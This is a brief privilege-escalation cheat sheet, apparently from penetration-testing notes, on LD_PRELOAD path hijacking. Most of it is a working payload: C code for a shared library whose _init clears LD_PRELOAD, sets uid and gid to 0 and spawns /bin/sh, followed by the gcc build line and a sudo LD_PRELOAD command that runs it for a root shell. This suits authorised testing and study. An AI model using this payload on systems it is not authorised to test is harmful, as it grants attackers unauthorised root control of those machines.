Path Hijacking

LD_PRELOAD

Check if you can write into the path of privileged binaries, you might be able to abuse the library load order. Check wich functions a binary uses via objectdump -T. To use these preload attacks with sudo in /etc/sudoers there must be env_keep += LD_PRELOAD

Preload example payload

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
  unsetenv("LD_PRELOAD");
  setgid(0);
  setuid(0);
  system("/bin/sh");
}

Compile preload example payload

gcc -fPIC -shared -o payload.so payload.c -nostartfiles
sudo LD_PRELOAD=/tmp/payload.so <target>

When playing with the linker configs run ldconfig afterwards or it wont update the linker cache.

Last updated